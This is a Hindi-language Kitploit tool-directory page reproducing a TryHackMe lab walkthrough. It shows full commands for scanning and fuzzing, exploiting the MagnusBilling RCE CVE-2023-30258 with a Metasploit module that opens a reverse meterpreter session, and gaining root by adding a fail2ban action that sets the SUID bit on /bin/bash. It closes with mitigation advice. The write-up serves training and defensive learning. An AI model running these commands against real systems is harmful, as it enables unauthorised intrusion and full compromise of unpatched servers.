Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
THM-MagnusBilling-CVE-2023-30258-Exploit — CVE-2023-30258 (MagnusBilling RCE) का शोषण करने और fail2ban गलत कॉन्फ़िगरेशन के माध्यम से TryHackMe लैब पर विशेषाधिकार बढ़ाने का चरण-दर-चरण वॉकथ्रू। वेब एनुमरेशन, Metasploit शोषण, और लिनक्स विशेषाधिकार वृद्धि को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/cyb3rk0ala/thm-magnusbilling-cve-2023-30258-exploit
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लैब और अभ्यास
GitHubcyb3rk0ala/thm-magnusbilling-cve-2023-30258-exploit

THM-MagnusBilling-CVE-2023-30258-Exploit

CVE-2023-30258 (MagnusBilling RCE) का शोषण करने और fail2ban गलत कॉन्फ़िगरेशन के माध्यम से TryHackMe लैब पर विशेषाधिकार बढ़ाने का चरण-दर-चरण वॉकथ्रू। वेब एनुमरेशन, Metasploit शोषण, और लिनक्स विशेषाधिकार वृद्धि को प्रदर्शित करता है।

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

THM-MagnusBilling-CVE-2023-30258

⸻

🛡️ MagnusBilling RCE → रूट (CVE-2023-30258)

📌 अवलोकन • लक्ष्य: 10.145.148.203 • प्लेटफ़ॉर्म: TryHackMe • कमज़ोरी: CVE-2023-30258 • पहुँच: बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) • विशेषाधिकार वृद्धि: fail2ban गलत कॉन्फ़िगरेशन • अंतिम पहुँच: रूट

⸻

🔍 1. टोह लेना (Reconnaissance)

पोर्ट स्कैन

rustscan -a 10.145.148.203

📊 खुले पोर्ट

पोर्ट सेवा 22 SSH 80 HTTP 3306 MySQL 5038 Asterisk Screenshot 2026-04-08 at 22 09 15

Asterisk की उपस्थिति VoIP/बिलिंग प्रणाली की ओर संकेत करती है।

⸻

🌐 2. वेब एन्यूमरेशन

डायरेक्टरी फ़ज़िंग

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c

📁 निष्कर्ष: • /archive • /assets • /lib • /tmp • /protected

/mbilling पथ को संभावित हमले के वेक्टर के रूप में पहचाना गया है। Screenshot 2026-04-08 at 22 06 08

⸻

🚨 3. कमज़ोरी की पहचान

CVE-2023-30258

MagnusBilling निम्नलिखित के प्रति संवेदनशील है: • बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) • कमांड इंजेक्शन • पूर्ण सिस्टम समझौता

⸻

💣 4. शोषण (Metasploit)

msfconsole

search CVE:2023-30258

use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

set RHOSTS 10.145.148.203 set LHOST tun0 set LPORT 4444 run Screenshot 2026-04-08 at 22 03 12 Screenshot 2026-04-08 at 22 03 39

⸻

🎯 परिणाम

meterpreter सत्र खुल गया

sysinfo

OS: Linux Debian User: asterisk

Screenshot 2026-04-08 at 22 04 03

⸻

🔐 5. प्रारंभिक पहुँच

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

whoami

asterisk

⸻

🏁 6. उपयोगकर्ता फ़्लैग

cd /home/magnus cat user.txt

⸻

🔎 7. विशेषाधिकार वृद्धि

sudo जाँचें

sudo -l

(ALL) NOPASSWD: /usr/bin/fail2ban-client

गंभीर गलत कॉन्फ़िगरेशन का पता चला!

Screenshot 2026-04-08 at 22 22 42

⸻

💣 8. Fail2Ban का शोषण

दुर्भावनापूर्ण एक्शन जोड़ें

sudo fail2ban-client set mbilling_login addaction evil

sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"

sudo fail2ban-client set mbilling_login banip 127.0.0.1

Screenshot 2026-04-08 at 22 05 14

⸻

🚀 9. रूट पहुँच

/bin/bash -p

id

euid=0(root)

शुरुआत में whoami ने asterisk लौटाया। bash -p का उपयोग करके रूट तक वृद्धि की जाती है।

Screenshot 2026-04-08 at 22 05 40

⸻

👑 10. रूट फ़्लैग

cat /root/root.txt

⸻

🧠 11. मुख्य निष्कर्ष • CVE शोषण ने आसान प्रारंभिक पहुँच प्रदान की • वेब एन्यूमरेशन महत्वपूर्ण है (ffuf ने /mbilling की पहचान की) • गलत कॉन्फ़िगर किया गया sudo पूर्ण सिस्टम समझौते का कारण बन सकता है • fail2ban का दुरुपयोग विशेषाधिकार वृद्धि के लिए किया जा सकता है

⸻

🛡️ 12. शमन (Mitigation) • MagnusBilling को नवीनतम संस्करण में अपडेट करें • sudo कॉन्फ़िगरेशन से NOPASSWD हटाएँ • fail2ban-client तक पहुँच प्रतिबंधित करें • वेब अनुप्रयोगों और एंडपॉइंट्स को सख्त करें

⸻

💀 निष्कर्ष

यह मशीन एक यथार्थवादी हमले की श्रृंखला प्रदर्शित करती है:

वेब RCE → शेल → विशेषाधिकार वृद्धि → रूट

कमज़ोरी + गलत कॉन्फ़िगरेशन के संयोजन ने पूर्ण सिस्टम समझौता किया।

टूल डाउनलोड करें